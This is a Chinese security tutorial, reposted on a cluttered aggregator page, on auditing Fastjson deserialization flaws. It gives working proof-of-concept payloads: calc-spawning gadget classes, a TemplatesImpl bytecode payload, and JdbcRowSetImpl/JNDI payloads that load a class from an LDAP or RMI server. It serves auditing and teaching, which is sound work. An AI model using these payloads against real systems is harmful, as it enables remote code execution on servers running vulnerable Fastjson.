当前位置: 首页 > news >正文

两学一做微网站交流扬州网站建设费用

两学一做微网站交流,扬州网站建设费用,ps培训班要学多久多少钱,四川省凉亭建设工程有限公司网站一、fastjson反序列化审计思路 Fastjson是Alibaba开发的高性能JSON库,用于将数据在JSON和Java对象之间互相转换,不需要添加额外的依赖,能够直接跑在JDK上。Fastjson是自己实现的一套序列化和反序列化机制,不是用Java原生的序列化和…

一、fastjson反序列化审计思路
Fastjson是Alibaba开发的高性能JSON库,用于将数据在JSON和Java对象之间互相转换,不需要添加额外的依赖,能够直接跑在JDK上。Fastjson是自己实现的一套序列化和反序列化机制,不是用Java原生的序列化和反序列化机制。通过Fastjson反序列化漏洞,攻击者可以传入一个恶意构造的JSON内容,程序对其进行反序列化后得到恶意类并执行了恶意类中的恶意函数,进而导致代码执行。如果构造函数、get/set方法、static静态代码块存在可利用的入口,则可能导致反序列化漏洞的存在。

二、fastjson反序列化本地代码验证
1.构造函数、get/set方法(需要public权限)、static静态代码块存在可利用的入口,则可能导致反序列化漏洞的存在。

study1
import java.io.IOException;
import java.io.Serializable;public class Study1 implements Serializable {private String name;private String baby;static{try {Runtime.getRuntime().exec("calc");} catch (IOException e) {throw new RuntimeException(e);}}public    Study1(){try {Runtime.getRuntime().exec("calc");} catch (IOException e) {throw new RuntimeException(e);}}public String getName(){try {Runtime.getRuntime().exec("calc");return name;} catch (IOException e) {throw new RuntimeException(e);}}public void setBaby(String baby){try {Runtime.getRuntime().exec("calc");this.baby=baby;} catch (IOException e) {throw new RuntimeException(e);}}
}入口执行
import com.alibaba.fastjson.JSON;
import org.junit.Test;public class FastJsonTest {@Testpublic void fastjson(){String jsonString = "{\"@type\":\"Study1\",\"baby\":\"ddds\"}";Object obj = JSON.parseObject(jsonString);System.out.println(obj);System.out.println(obj.getClass());}
}

在这里插入图片描述
2.基于Templatelmpl
影响范围: FastJson 1.2.22-1.2.24版本
限制: 需要设置Feature.SupportNonPublicField属性才能成功触发。
{“@type”:“com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl”,“_bytecodes”:[“yv66vgAAADsAKAo…”],‘_name’:‘a.b’,‘_tfactory’:{},“_outputProperties”:{},“_version”:“1.0”,“allowedProtocols”:“all”}

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import org.apache.commons.codec.binary.Base64;
import org.junit.Test;
import com.alibaba.fastjson.parser.ParserConfig;
import org.apache.commons.io.IOUtils;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;public class Templatelmpl {private static String readClass(String classFilePath) {ByteArrayOutputStream bos = new ByteArrayOutputStream();try {IOUtils.copy(new FileInputStream(new File(classFilePath)), bos);} catch (IOException e) {e.printStackTrace();}return Base64.encodeBase64String(bos.toByteArray());}@Testpublic void Temp(){String classFilePath = "src\\test\\java\\poc.class";String evilCode = readClass(classFilePath);String text1 = "{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\",\"_bytecodes\":[\""+evilCode+"\"],'_name':'a.b','_tfactory':{},\"_outputProperties\":{ }," +",\"_version\":\"1.0\",\"allowedProtocols\":\"all\"}";System.out.println(text1);Object obj = JSON.parseObject(text1, Object.class, Feature.SupportNonPublicField);}
}poc.java---poc.class
import java.io.IOException;
import java.io.Serializable;public class poc implements Serializable {static {try {Runtime.getRuntime().exec("calc");} catch (IOException e) {throw new RuntimeException(e);}}public poc() {try {Runtime.getRuntime().exec("calc");} catch (IOException e) {throw new RuntimeException(e);}}public static void main(String[] args) throws IOException {poc p = new poc();}
}

三、常见历史fastjson反序列化漏洞
基于JdbcRowSetImpl(可以远程利用,黑盒也能测)
由于是利用JNDI注入漏洞来触发的,因此主要的限制因素是JDK版本。RMI利用的JDK版本<=6u141、7u131、8u121,LDAP利用的JDK版本<=6u211、 7u201、8u191。
1.2.22-1.2.24
String payload = “{”@type":“com.sun.rowset.JdbcRowSetImpl”,“dataSourceName”:“ldap://192.168.0.8:1099/poc”, “autoCommit”:true}“;
1.2.48
String payload = “{“name”:{”@type”:“java.lang.Class”,“val”:“com.sun.rowset.JdbcRowSetImpl”},“x”:{“@type”:“com.sun.rowset.JdbcRowSetImpl”,“dataSourceName”:“ldap://127.0.0.1:1389/#EvilCalc1”,“autoCommit”:true}}}“;
1.2.62
String text1 = “{”@type”:“org.apache.xbean.propertyeditor.JndiConverter”,“AsText”:“rmi://127.0.0.1:1099/exploit”}";

poc
import com.alibaba.fastjson.JSON;
public class JdbcRowSetImpl {public static void main(String[] args) {String payload = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://127.0.0.1:1099/poc\", \"autoCommit\":true}";JSON.parse(payload);}
}

开启ldap和web服务
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
补充:Fastjson1.2.25版本新增了checkAutoType方法,设置了autotype开关,对@type字段进行限制。
四、实战中怎么去做fastjson的代码审计

审计0day:
查看pom文件确认使用fastjson组件(非maven项目去找jar,往往放在一个lib,比如webapp/web-inf/lib)-------查找反序列化函数------构造利用点如构造函数、get/set方法(需要public权限)、static静态代码块------利用验证

审计历史漏洞:
查看pom文件(非maven项目去找jar,往往放在一个lib,比如webapp/web-inf/lib)确认使用fastson组件------确认使用fastjon组件版本-------寻找反序列化构造点------poc调用验证

http://www.dtcms.com/a/574297.html

相关文章:

  • 网站开发 xmind长春建站网站模板
  • WebView 调试工具全解析,解决“看不见的移动端问题”
  • 论坛网站建设流程wordpress 页面压缩
  • 如果做京东优惠卷的网站七台河新闻联播视频
  • 永久免费自助建站源代码一个企业网站ppt怎么做
  • 工商网站官网入口seo顾问是干什么
  • 国产化云桌面有哪些有实力的厂家?
  • MediaPipe+OpenCV的python实现交互式贪吃蛇小游戏
  • 解析网站dns软件外包公司如何接单
  • 汽车排放检测的 “模块化核心”:HORIBA OBS-ONE GS Unit 气体分析单元技术解析
  • 【每天一个AI小知识】:什么是联邦学习?
  • 安卓进阶——多媒体
  • Spring Boot3零基础教程,响应式编程的模型,笔记109
  • 解读IEC 60086-4 2025
  • 学做网站论坛 可以吗360建筑工程网
  • 济南旅游团购网站建设动态电子商务网站建设报告
  • 企业做网站用dedeCMS免费吗在线资源搜索引擎
  • 什么是离子注入的注入剂量?
  • 静态网站 挂马北京网站设计的公司价格
  • 厦门建设局网站商品房免费免费网站模板
  • 怎么做谷歌这样的网站刷赞网站推广免费链接
  • 5、foc控制系统——电流环设计
  • 代码随想录打卡day25:56.合并区间
  • 【C++】C++11新特性 (上)
  • vue3+ts element-plus动态Icon图标统一注册
  • 用户组管理指令大全
  • 网站建设经费保障青海网站开发多少钱
  • 跨越协议鸿沟:RS485转ETHERCAT网关在电力电动机保护中的破局之道
  • 【开题答辩全过程】以 扶贫农产品销售平台APP为例,包含答辩的问题和答案
  • 专业做网站建设公司有哪些o2o网站建设行业现状